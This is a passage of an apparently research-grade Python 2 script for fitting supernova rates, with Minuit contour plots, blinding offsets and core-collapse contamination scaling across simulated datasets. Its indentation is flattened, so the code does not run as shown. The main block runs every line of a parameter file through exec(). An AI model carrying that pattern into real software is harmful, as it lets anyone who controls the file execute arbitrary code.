#plt.close()
except:
print "Plot Fail A"
try:
if (Rate_Model != 'discrete'):
plt.clf()
MinObj.draw_profile('Beta', text = False)
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
plt.xticks(labels)
plt.savefig('{0}_{1}_beta_contour.png'.format(self.realName, self.simName))
plt.clf()
except:
print "Plot Fail C"
try:
if Rate_Model != 'discrete':
Betas = np.linspace(self.Beta - 0.5, self.Beta + 0.5, 51)
FCNs = []
for bTemp in Betas:
FCN = lamChi2( self.k, bTemp)
FCNs.append(FCN)
plt.plot(Betas, FCNs, c = 'k', label = 'Non Minuit Contour')
plt.legend()
plt.xlabel('Beta')
plt.ylabel('Chi2')
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
plt.xticks(labels)
plt.savefig('{0}_{1}_beta_mycontour.png'.format(self.realName, self.simName))
plt.clf()
except:
print "Plot Fail D"
if Rate_Model != 'discrete':
plt.clf()
ax = plt.axes()
Betas = np.linspace(self.Beta - 0.1, self.Beta + 0.1, 501)
FCNs = []
for bTemp in Betas:
FCN = lamChi2( self.k, bTemp)
FCNs.append(FCN)
plt.plot(Betas, FCNs, c = 'k', label = 'Non Minuit Contour')
plt.legend()
plt.xlabel('Beta')
plt.ylabel('Chi2')
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
ax.set_xticklabels(labels)
print "FCNs"
print FCNs
plt.savefig('{0}_{1}_beta_myzoomcontour.png'.format(self.realName, self.simName))
plt.clf()
plt.clf()
ax = plt.axes()
ks = np.linspace(self.k - 0.1, self.k + 0.1, 501)
FCNs = []
for kTemp in ks:
FCN = lamChi2( kTemp,self.Beta)
FCNs.append(FCN)
plt.plot(ks, FCNs, c = 'k', label = 'Non Minuit Contour')
plt.legend()
plt.xlabel('k')
plt.ylabel('Chi2')
print "FCNs"
print FCNs
plt.savefig('{0}_{1}_k_myzoomcontour.png'.format(self.realName, self.simName))
plt.clf()
df = np.array(FCNs[1:]) - np.array(FCNs[:-1])
inds = np.where(df > 0)[0]
print 'inds'
print inds
print inds < 250
print np.where(inds < 250)
inds = inds[np.where(inds < 250)]
print 'inds'
print inds
print "INDSSHAPE"
print inds.shape
if inds.shape[0]:
print "MINUIT IS PROBABLY MAD. HERES WHY"
print inds
print Betas[inds]
if inds.shape[0] > 1:
inds = inds[-1]
print inds
print Betas[inds]
lamChi2Dump(self.k, Betas[inds -3])
print "MINUIT MAD 2"
lamChi2Dump(self.k, Betas[inds -2])
print "MINUIT MAD 3"
lamChi2Dump(self.k, Betas[inds -1])
print "MINUIT MAD 4"
lamChi2Dump(self.k, Betas[inds])
print "MINUIT MAD 5"
lamChi2Dump(self.k, Betas[inds + 1])
print "MINUIT MAD 6"
lamChi2Dump(self.k, Betas[inds + 2])
print "MINUIT MAD 7"
lamChi2Dump(self.k, Betas[inds + 3])
print "END MINUIT MAD"
try:
if (Rate_Model != 'discrete'):
plt.clf()
MinObj.draw_mncontour('k','Beta', nsigma=3)
plt.savefig('{0}_{1}_k_beta_mncontour.png'.format(self.realName, self.simName))
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
plt.xticks(labels)
locs, labels = plt.yticks()
labels = locs + np.cos(cosVal)
plt.yticks(labels)
plt.clf()
MinObj.draw_mnprofile('Beta', text = False, subtract_min = True)
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
plt.xticks(labels)
plt.savefig('{0}_{1}_beta_mncontour.png'.format(self.realName, self.simName))
plt.clf()
#xgrid,ygrid, sigma, rawdata = MinObj.mncontour_grid('k', 'Beta', numpoints=30, sigma_res = 1, nsigma = 2.0)
#fig, ax = plt.subplots(1)
#plt.clf()
#CS = ax.contour(xgrid, ygrid + self.MCBeta, sigma, levels = [ 1.0, 2.0])
#ax.clabel(CS, fontsize=7, inline=1)
#ax.set_xlabel('k')
#ax.set_ylabel('Beta')
#if Blind:
# ax.set_xticklabels([])
# ax.set_yticklabels([])
#plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName))
#plt.close()
except:
print "Plot Fail B"
pass
#plt.axhline(y = self.MCBeta, c = 'k', label = 'True Beta')
#plt.axhline(y = Beta + self.MCBeta, c = 'g', label= 'Best Fit Beta')
#plt.axvline(x = k, label = 'Best Fit k')
'''
'''
def chi2V2(self, fJs, fJErrs, zCenters, k, Beta):
fitfJs = k*(1+zCenters)**Beta
Chi2Temp = 0
for fJ, fitfJ, fJErr in zip(fJs, fitfJs, fJErrs):
Chi2Temp += (fJ - fitfJ)**2/(fJ + fJErr)
return Chi2Temp
'''
def weakPrior(value, priorTuple):
if value < priorTuple[1]:
if value > priorTuple[0]:
return 1
else:
return (value - priorTuple[0])**4
else:
return (value - priorTuple[1])**4
def ratePrior(fitK, fitBeta, priorRate, zEffPrior, priorRateErrUp = None, priorRateErrDown = None, priorRateErrAll = None):
print "PRIOR"
print priorRate
print zEffPrior
print priorRateErrUp
print priorRateErrDown
print "Fit Beta/k"
print fitBeta
print fitK
fitRate = fitK*(1+zEffPrior)**fitBeta
print 'Fit Rate'
print fitRate
print "PriorChi2"
if fitRate > priorRate:
if not (priorRateErrUp is None):
print (fitRate - priorRate)**2/priorRateErrUp**2
return (fitRate - priorRate)**2/priorRateErrUp**2
else:
print (fitRate - priorRate)**2/priorRateErrAll**2
return (fitRate - priorRate)**2/priorRateErrAll**2
else:
if not (priorRateErrDown is None):
print (fitRate - priorRate)**2/priorRateErrDown**2
return (fitRate - priorRate)**2/priorRateErrDown**2
else:
print (fitRate - priorRate)**2/priorRateErrAll**2
return (fitRate - priorRate)**2/priorRateErrAll**2
def getCCScale(simCat, dataCat, MURESWindow = (-1, 1), zbins = [0.0, 0.3, 0.6, 0.9, 1.2], Beta = None, binList = None, fracCCData = None, outfilePrefix = 'Test', Rate_Model = 'powerlaw', f_Js = None, returnHist = False, debug = False, simInd = 100, ztype = 'zPHOT'):
#import iminuit as iM
#from iminuit import Minuit as M
if debug:
print "Check this"
print Rate_Model
print f_Js
print Beta
print fracCCData
print "Done Checking"
CCScales = []
CCScaleErrs = []
simIaHists = []
simCCHists = []
dataHists = []
if not(f_Js is None):
f_Js = np.array(f_Js)
allSimCC = simCat[simCat['SIM_TYPE_INDEX'].astype(int) != 1]
allSimIa = simCat[simCat['SIM_TYPE_INDEX'].astype(int) == 1]
allData = np.copy(dataCat)
#fnorm2 = float(dataCat.shape[0])/float(np.sum(simHist))
simCat = simCat[(simCat['MURES'] < MURESWindow[0]) | (simCat['MURES'] > MURESWindow[1]) ]
dataCat = dataCat[(dataCat['MURES'] < MURESWindow[0]) | (dataCat['MURES'] > MURESWindow[1]) ]
for zl, zh in zip(zbins[:-1], zbins[1:]):
tempSim = simCat[(simCat[ztype] < zh) & (simCat[ztype] > zl)]
tempData = dataCat[(dataCat[ztype] < zh) & (dataCat[ztype] > zl)]
allSimCCZbin = allSimCC[(allSimCC[ztype] < zh) & (allSimCC[ztype] > zl)]
allSimIaZbin = allSimIa[(allSimIa[ztype] < zh) & (allSimIa[ztype] > zl)]
if debug:
print "all Sim CC Zbin/IaZbin"
print allSimCCZbin.shape[0]
print allSimIaZbin.shape[0]
allDataZbin = allData[(allData[ztype] < zh) & (allData[ztype] > zl)]
tempSimCC = tempSim[tempSim['SIM_TYPE_INDEX'] != 1]
tempSimIa = tempSim[tempSim['SIM_TYPE_INDEX'] == 1]
R = float(tempData.shape[0])/float(allDataZbin.shape[0])
if debug:
print "R"
print R
print "Hist CC, outlier and total"
print tempSim.shape[0]
print allSimCCZbin.shape[0]
print "pre Beta Correction allSimIa"
print tempData.shape[0]
print allSimIaZbin.shape[0]
if Rate_Model == 'discrete':
hist, bins = np.histogram(allSimIaZbin[ztype], bins = 11)
if debug:
print 'fJ shape'
print f_Js.shape
print f_Js
print hist
print bins
betaCorrAllSimIaZbin =np.sum(hist*f_Js)
else:
betaCorrAllSimIaZbin =np.sum((1+ allSimIaZbin[ztype])**Beta)
#S = float(np.array(R*histSAllIa) - np.array(tempSimIa.shape[0]))/float(np.array(tempSimCC.shape[0]) - np.array(R*histSAllCC))
try:
if debug:
print "Test S"
print R
print betaCorrAllSimIaZbin
print tempSimIa.shape[0]
print tempSimCC.shape[0]
print allSimCCZbin.shape
print 'EEE'
print np.array(R*betaCorrAllSimIaZbin)
print 'DDD'
print np.array(tempSimIa.shape[0])
print 'CCC'
print (np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))
print "AAA"
print (np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))
print "BBB"
#S = (np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))
S = float(np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/float(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))
except:
S = np.nan
if debug:
print "S WTF"
print S
print "Uncertainty Related Bullshit"
'''
print "Delta R"
dR = np.sqrt(histD + histDAll)
print dR
num1 = np.sqrt(np.sqrt((dR/R)**2 + histSAllIa) + tempSimIa.shape[0])
num2 = np.sqrt(np.sqrt((dR/R)**2 + histSAllCC) + tempSimCC.shape[0])
den1 = (R*histSAllIa - tempSimIa.shape[0])
den2 = (tempSimCC.shape[0] - R*histSAllCC)
dS = np.sqrt((num1/den1)**2 + (num2/den2)**2)
'''
#ddnCC = np.sqrt(tempSimCC.shape[0])*(tempSimIa.shape[0] - histSAllIa*R)/(tempSimCC.shape[0] - R*histSAllCC)**2
#ddNCC = np.sqrt(histSAllCC)*R*(histSAllIa*R - tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC)**2
#ddnIa = np.sqrt(tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC)
#ddNIa = np.sqrt(histSAllIa)*R/(tempSimCC.shape[0] - R*histSAllCC)
ddnCC = np.sqrt(tempSimCC.shape[0])*(tempSimIa.shape[0] - allSimIaZbin.shape[0]*R)/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])**2
ddNCC = np.sqrt(allSimCCZbin.shape[0])*R*(allSimIaZbin.shape[0]*R - tempSimIa.shape[0])/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])**2
ddnIa = np.sqrt(tempSimIa.shape[0])/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])
ddNIa = np.sqrt(allSimIaZbin.shape[0])*R/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])
#ddR = (histSAllIa*tempSimCC.shape[0] - histSAllCC * tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC)**2
dS = np.sqrt(ddnCC**2 + ddNCC**2 + ddnIa**2 + ddNIa**2)# + ddR**2)
if debug:
print "ddnCC"
print ddnCC
print "ddNCC"
print ddNCC
print "ddnIa"
print ddnIa
print "ddNIa"
print ddNIa
#print "ddR"
#print ddR
print "Delta S"
print dS
#assert(S > 0)
if S < 0:
S = np.nan
if np.isnan(S):
print 'SCALE IS NAN'
if len(CCScales) > 0:
#CCScales.append(CCScales[-1])
CCScales.append(1.0)
else:
CCScales.append(1.0)
else:
CCScales.append(S)
if type(dS) == np.ndarray:
if np.isnan(dS[0]):
CCScaleErrs.append(1.0)
else:
CCScaleErrs.append(dS[0])
else:
if np.isnan(dS):
CCScaleErrs.append(1.0)
else:
CCScaleErrs.append(dS)
#if debug:
# print "CC PlotDebug"
# print (simBinsCC[1:] + simBinsCC[:-1])/2.0
# print simHistCC
# print CCScales[0]
# print dS
# print fnorm2
# print histD
# print (muresBins[1:] + muresBins[:-1])/2.0
#if simInd ==1:
# plt.step((simBinsCC[1:] + simBinsCC[:-1])/2.0, simHistCC*fnorm2, c = 'b', where = 'mid', label = 'prescaled Sim CC')
# plt.step((simBinsCC[1:] + simBinsCC[:-1])/2.0, CCScales[0]*simHistCC*fnorm2, c = 'g', where = 'post', label = 'postscaledSimCC')
# plt.step((muresBins[1:] + muresBins[:-1])/2.0, histD, c = 'r', where = 'mid', label = 'data')
# plt.legend()
# plt.savefig(outfilePrefix + 'ScaledHist.png')
# plt.clf()
if debug:
print "CCScaleErrs"
print CCScaleErrs
if returnHist:
return CCScales, CCScaleErrs, simIaHists, simCCHists, dataHists
return CCScales, CCScaleErrs
def applyCCScale(NCC, CCScales, CCScaleErrs, datazbins = None, zbins = None):
if not(zbins is None):
zbins = np.array(zbins)
if not (datazbins is None):
datazbins = np.array(datazbins)
if type(CCScaleErrs) == list:
CCScaleErrs = np.array(CCScaleErrs)
if type(CCScales) == list:
CCScales = np.array(CCScales)
print 'CCScaleErrs'
print CCScaleErrs
print datazbins
print zbins
if type(CCScales) == np.ndarray:
if CCScales.shape[0] == 1:
NCCScaled = CCScales[0]*NCC
else:
if (datazbins is None) | (zbins is None):
assert(0)
if CCScales.shape[0] < 4:
k = CCScales.shape[0] -1
else:
k = 3
nancond = np.isnan(CCScales)
if np.sum(nancond) > 0:
CCScales[nancond] = 1.
CCScaleErrs[nancond] = 1.
zCenters = (zbins[1:]+ zbins[:-1])/2.0
print zCenters
print CCScales
#spline = UnivariateSpline(zbins, CCScales, w = 1.0/CCScaleErrs, k = k)
spline = UnivariateSpline(zCenters, CCScales, w = 1.0/CCScaleErrs, k = k)
print datazbins.shape
print datazbins
print NCC.shape
datazcents = (datazbins[1:]+ datazbins[:-1])/2.0
NCCScaled = spline(datazcents)*NCC
elif (type(CCScales) == int) | (type(CCScales) == float):
NCCScaled = CCScales*NCC
else:
assert(0)
NCCScaled = NCCScaled.clip(0)
print NCCScaled
assert(not bool(np.sum(NCCScaled < 0)))
return NCCScaled
if __name__ == '__main__':
from sys import argv
print "argv"
print argv
datadir = argv[1]
simdir = argv[2]
dataname = argv[3]
print "dataname"
simname = argv[4]
print simname
simgenfile = argv[5]
print simgenfile
NNCut = False
cheatType = bool(int(argv[6]))
cheatZ = bool(int(argv[7]))
trueBeta = float(argv[8])
paramFile = argv[9]
cutFiles = [argv[10]]
try:
debug = bool(int(argv[11]))
except:
debug = False
#if( ('Combine' in simdir) or ('SALT2' in simdir)) & (('Combine' in datadir) or ('SALT2' in simdir)):
#NNCut = True
#NNProbCut = 0.95
#if len(argv) > 6:
# NNCut = True
# NNProbCut = 0.9
# NNData = argv[6]
# NNSim = argv[7]
#default params
zminFit = 0.1
zmaxFit = 1.2
zminSamp = 0.1
zmaxSamp = 1.2
MJDMin = 0.0
MJDMax = np.inf
bins = "equalSize"
runFit = True
fracContamCuts = [-1]
fixBeta = True
fixK = False
nbins = None
binList = None
ScaleMuResCutLow = -1
ScaleMuResCutHigh = 1
#muresBins = 1
muresBinsLow = 3
muresBinsHigh = 3
scaleZBins = [0.0, 1.2]
nScaleZBins = None
cheatCCSub = False
cheatCCScale = False
ZSysFlag = False
Blind = False
Rate_Model = 'powerlaw'
MURESCuts = 2.0 #[(0.0, 0.8, -0.5, 0.5), (0.8, 1.5, -1, 1)]
noCCMC = False
fixCCScale = False
trueMCBeta = 1.65
trueMCK = 1.97E-5
priorRate = None
priorZEff = None
ratePriorErrUp = None
ratePriorErrDown =None
ratePriorErrAll = None
priors = None
#override file
params = open(paramFile, 'r').readlines()
for p in params:
print p
exec(p)
if nScaleZBins is None :
redoScaleZBinFlag = False
else:
redoScaleZBinFlag = True
if not(priors is None):
if len(priors) == 3:
priorRate, priorZEff, ratePriorErrAll = priors
ratePriorErrUp = None
ratePriorErrDown = None
elif len(priors) == 4:
priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown = priors
ratePriorErrAll =None
cosVal = 47392945716038.134971247
kmean = []
ksigma = []
kErr = []
BetaMean = []
#BetaWeightMean = []
#KWeightMean = []
BetaSigma= []
BetaErr = []
zBreakMeans = []
zBreakSigmas =[]
zBreakErrs = []
Chi2Mean = []
Chi2Sigma = []
f_JStorage = []
f_JErrStorage = []
SampleSizes = []
CCScaleStorageGlobal = []
CCScaleErrStorageGlobal = []
#MURES_Cuts = [2.0]
#MURES_Cuts = [1.0, 1.5, 2.0, 3.0, 4.0, 99.0, 2.0]
#for MURES_Cut in MURES_Cuts:
fcc = -1
for cf in cutFiles:
cuts = [] # cuts = [('FITPROB', 0.01, np.inf), ('NN_PROB_IA', NNProbCut, np.inf)]
cutlist = open(cf, 'r').readlines()
for l in cutlist:
spl = l.split()
cuts.append(('{0}'.format(spl[0]), float('{0}'.format(spl[1])), float('{0}'.format(spl[2]))))
ks = []
kErrs = []
Betas = []
BetaErrs = []
zBreaks =[]
zBreakErrs = []
Chi2s = []
CCScaleStorage = []
CCScaleErrStorage = []
nFail = 0
simLoaded = False
#print "FUCK MPI"
#if Rate_Model == 'discrete':
# subprocess.call(['python', 'constructChi2Func.py', str(nbins)], shell = False)
#print "MPI Fucked"
if '{' in datadir:
if os.path.exists(datadir.format(98)):
print "MOAR SIMS"
nfile = 101
else:
print "FEWAR SIMS"
nfile = 49
else:
nfile = 2
for simInd in range(1,nfile):
#print "Sim {0}".format(simInd)
#SimBeta = 2.1 # simdir.split('_')[-3]
#SimR0 = 1.7*10**-5 #simdir.split('_')[-5]
#print "Sim R0 = {1}; Sim Beta = {0}".format(SimBeta, SimR0)
print datadir.format(simInd)
if simLoaded:
try:
RateTest.newData(datadir.format(simInd), dataname.format(simInd), simInd =simInd)
if ZSysFlag:
assert(0)
RateTest.zSystematic(nbins = nbins, binList = binList)
if redoScaleZBinFlag:
RealCat = RateTest.postCutRealCat
RealOutlierCat = RealCat[(RealCat['MURES'] > muresBinsHigh)| (RealCat['MURES'] < muresBinsLow)]
zArray =RealOutlierCat[RateTest.ztype]
zArray.sort()
splitZs = np.array_split(zArray, nScaleZBins)
#[(0[0], (0[-1] + 1[0]), (1[-1] + 2[0]), 2[1]]
scaleZBins = [splitZs[0][0]]
for i in range(1,nScaleZBins):
scaleZBins.append((splitZs[i-1][-1] + splitZs[i][0] )/2.0)
scaleZBins.append(splitZs[i][-1])
#RateTest.effCalc(nbins = nbins, fracContamCut = fcc, simInd =simInd)
#RateTest.effCalc(nbins = 20)
BetaIter = []
BetaErrIter = []
CCIter = []
CCErrIter = []
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, simInd =simInd, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, TrueCCScale = TrueCCScale, scaleZBins = scaleZBins, Blind = Blind)
if Rate_Model != 'discrete':
if Blind:
print "Blinding A"
BetaIter.append(RateTest.Beta+ np.cos(cosVal))
else:
BetaIter.append(RateTest.Beta)
BetaErrIter.append(RateTest.BetaErr)
for iteration in range(nIter):
if not fixCCScale:
if not noCCMC:
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname,Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)
CCIter.append(CCScale)
CCErrIter.append(CCScaleErr)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = CCScale, CCScaleErr = CCScaleErr, TrueCCScale = TrueCCScale, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind)
else:
CCIter.append(0.0)
CCErrIter.append(0.0)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 0.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind)
else:
CCIter.append(1.0)
CCErrIter.append(0.0)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind)
if Blind:
print "Blinding b"
BetaIter.append(RateTest.Beta+ np.cos(cosVal))
else:
BetaIter.append(RateTest.Beta)
BetaErrIter.append(RateTest.BetaErr)
if not fixCCScale:
if not noCCMC:
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname,Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)
CCIter.append(CCScale)
CCErrIter.append(CCScaleErr)
else:
CCIter.append(1.0)
CCErrIter.append(0.0)
print "CCScale Progression"
print CCIter
print "CCScale Err Progression"
print CCErrIter
if Rate_Model != 'discrete':
print "Beta Progression"
print BetaIter
print "Beta Err Progressions"
print BetaErrIter
print "Mean Betas"
print np.nanmean(BetaIter)
print "Mean CCScales"
print np.nanmean(CCIter)
else:
f_JStorage.append(RateTest.fJList)
f_JErrStorage.append(RateTest.fJErrList)
#print "AAA CC Scales"
if not fixCCScale:
if not noCCMC:
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)
print CCScale
CCScaleStorage.append(CCScale)
CCScaleErrStorage.append(CCScaleErr)
else:
CCScaleStorage.append(0.0)
CCScaleErrStorage.append(1.0)
else:
CCScaleStorage.append(1.0)
CCScaleErrStorage.append(1.0)
ks.append(RateTest.k)
kErrs.append(RateTest.kErr)
if Blind:
print "Blinding c"
Betas.append(RateTest.Beta+ np.cos(cosVal))
else:
Betas.append(RateTest.Beta)
BetaErrs.append(RateTest.BetaErr)
if Rate_Model == 'brokenpowerlawVar':
zBreaks.append(Rate_Fitter.zBreak)
zBreakErrs.append(Rate_Fitter.zBreakErr)
Chi2s.append(RateTest.chi2)
print "CCScale Storage Iter {0}".format(simInd)
print CCScaleStorage
if not noCCMC:
print CCScale
print CCScale[0]
dnamestr = datadir.format(simInd)
cutdnamestr = dnamestr.split('.')[0] + '+CUTS.FITRES.gz'
#if saveCuts:
# np.savetxt(cutdnamestr, RateTest.realcat.Catalog, delimiter = ' ', fmt='%s')
lowzCut = zminFit
highzCut = zmaxFit
SampleSizes.append( RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)].shape[0])
if saveCuts:
np.savetxt(cutdnamestr, RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)], delimiter = ' ', fmt='%s')
#with open(cutdnamestr, 'rb') as f_in:
# with gzip.open(cutdnamestr + '.gz', 'wb') as f_out:
# shutil.copyfileobj(f_in, f_out)
except Exception, e:
print "FAILURE"
print e
traceback.print_exc()
nFail +=1
else:
try:
RateTest = Rate_Fitter(datadir.format(simInd), dataname.format(simInd), simdir, simname,simgenfile, trueMCBeta, trueMCK, zminSamp =zminSamp, zmaxSamp =zmaxSamp, zminFit =zminFit, zmaxFit =zmaxFit, cheatZ = cheatZ, cheatType = cheatType, cuts = cuts, cheatCCSub = cheatCCSub, cheatCCScale = cheatCCScale, Rate_Model = Rate_Model, MURESCuts = MURESCuts, noCCMC = noCCMC, priorRate = priorRate, priorZEff = priorZEff, ratePriorErrUp = ratePriorErrUp, ratePriorErrDown =ratePriorErrDown, ratePriorErrAll = ratePriorErrAll)# , MJDMin = 0, MJDMax = np.inf)
if ZSysFlag:
RateTest.zSystematic(nbins = nbins, binList = binList)
simLoaded = True
RateTest.effCalc(nbinsSamp = nbinsSamp,nbinsFit = nbinsFit, fracContamCut = fcc)
#RateTest.effCalc(nbins = 20)
BetaIter = []
BetaErrIter = []
CCIter = []
CCErrIter = []
if redoScaleZBinFlag:
RealCat = RateTest.postCutRealCat
RealOutlierCat = RealCat[(RealCat['MURES'] > muresBinsHigh)| (RealCat['MURES'] < muresBinsLow)]
zArray =RealOutlierCat[RateTest.ztype]
zArray.sort()
print 'zArray'
print zArray
print 'nScaleZBins'
print nScaleZBins
splitZs = np.array_split(zArray, nScaleZBins)
#[(0[0], (0[-1] + 1[0]), (1[-1] + 2[0]), 2[1]]
scaleZBins = [splitZs[0][0]]
for i in range(1,nScaleZBins):
scaleZBins.append((splitZs[i-1][-1] + splitZs[i][0] )/2.0)
scaleZBins.append(splitZs[i][-1])
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, simInd =simInd, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, TrueCCScale = TrueCCScale, scaleZBins = scaleZBins, Blind = Blind)
if Rate_Model != 'discrete':
if Blind:
print "Blinding d"
BetaIter.append(RateTest.Beta+ np.cos(cosVal))
else:
BetaIter.append(RateTest.Beta)
BetaErrIter.append(RateTest.BetaErr)
for iteration in range(nIter):
print "interation Number"
print iteration
if not fixCCScale:
if not noCCMC:
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)
CCIter.append(CCScale)
CCErrIter.append(CCScaleErr)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = CCScale, CCScaleErr = CCScaleErr, TrueCCScale = TrueCCScale, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind)
else:
CCIter.append(0.0)
CCErrIter.append(1.0)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 0.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind)
else:
CCIter.append(1.0)
CCErrIter.append(1.0)
RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind)
if Rate_Model != 'discrete':
if Blind:
print "Blinding e"
BetaIter.append(RateTest.Beta+ np.cos(cosVal))
else:
BetaIter.append(RateTest.Beta)
BetaErrIter.append(RateTest.BetaErr)
if not fixCCScale:
if not noCCMC:
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)
CCIter.append(CCScale)
CCErrIter.append(CCScaleErr)
if Rate_Model != 'discrete':
print "Beta Progression"
print BetaIter
print "Beta Err Progressions"
print BetaErrIter
print "Mean Betas"
print np.nanmean(BetaIter)
else:
f_JStorage.append(RateTest.fJList)
f_JErrStorage.append(RateTest.fJErrList)
print "CCScale Progression"
print CCIter
print "CCScale Err Progression"
print CCErrIter
print "Mean CCScales"
print np.nanmean(CCIter)
if not fixCCScale:
if not noCCMC:
print "AAA CC Scales"
CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, f_Js =RateTest.fJList, Rate_Model = Rate_Model, simInd = simInd, debug = debug, ztype = RateTest.ztype)
print 'CC Scale'
print CCScale
CCScaleStorage.append(CCScale)
CCScaleErrStorage.append(CCScaleErr)
else:
CCScaleStorage.append(0.0)
CCScaleErrStorage.append(1.0)
else:
CCScaleStorage.append(1.0)
CCScaleErrStorage.append(1.0)
dnamestr = datadir.format(simInd)
cutdnamestr = dnamestr.split('.')[0] + '+CUTS.FITRES.gz'
np.savetxt(cutdnamestr, RateTest.realcat.Catalog, delimiter = ' ', fmt='%s')
#with open(cutdnamestr, 'rb') as f_in:
# with gzip.open(cutdnamestr + '.gz', 'wb') as f_out:
# shutil.copyfileobj(f_in, f_out)
cutsnamestr = simname.split('.')[0] + '+CUTS.FITRES.gz'
